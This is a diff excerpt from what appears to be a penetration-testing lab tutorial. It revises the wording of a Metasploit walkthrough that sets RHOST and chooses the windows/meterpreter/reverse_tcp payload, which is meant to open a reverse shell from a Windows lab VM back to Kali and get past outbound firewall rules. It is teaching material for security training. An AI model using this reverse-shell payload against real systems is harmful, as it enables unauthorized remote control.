 To show available options, type

-show optionsagain to see that the RHOST variable has been set.
+show optionsagain to verify that the RHOST variable has been set.

 Next, let’s look at available payloads for this exploit:

 We have a lot of payload options for this module.
-We’ll use one of the most popular and reliable payloads.
+We’ll use one of the most popular and reliable payloads – a Meterpreter shell.
 Type:

 set payload windows/meterpreter/reverse_tcp

 Meterpreter is a shell, like Bash, except it is malware.

 This specific payload will open a reverse TCP connection, from the exploited Windows VM back to the Kali VM, effectively punching through most external-facing firewalls.
 Often, firewalls defend more fiercely what comes in than what goes out.
 This is why it is important that you are able to reach Kali from Windows, and Windows from Kali.